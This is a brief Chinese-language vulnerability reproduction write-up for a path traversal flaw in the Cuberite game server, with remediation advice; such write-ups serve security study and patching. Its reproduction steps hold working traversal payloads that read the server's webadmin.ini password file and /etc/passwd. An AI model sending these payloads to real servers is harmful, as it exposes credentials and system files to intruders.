漏洞描述:
Cuberite是一款使用C++语言编写的、轻量级、可扩展的多人游戏服务器。
Cuberite 2019-06-11之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。
攻击者可利用该漏洞访问受限目录之外的内容。
复现过程:
1.访问http://ip:port,出现如下页面,开始实验
2.查看网站密码
/....//....//webadmin.ini
3.查看/etc/passwd
/....//....//....//....//....//....//....//....//....//etc/passwd
借此漏洞,可以访问攻击者想要的敏感数据,包括配置文件、日志、源代码等信息,更加方便攻击者对网站进行渗透。
修复建议:
1.升级版本
2.打补丁
3.上设备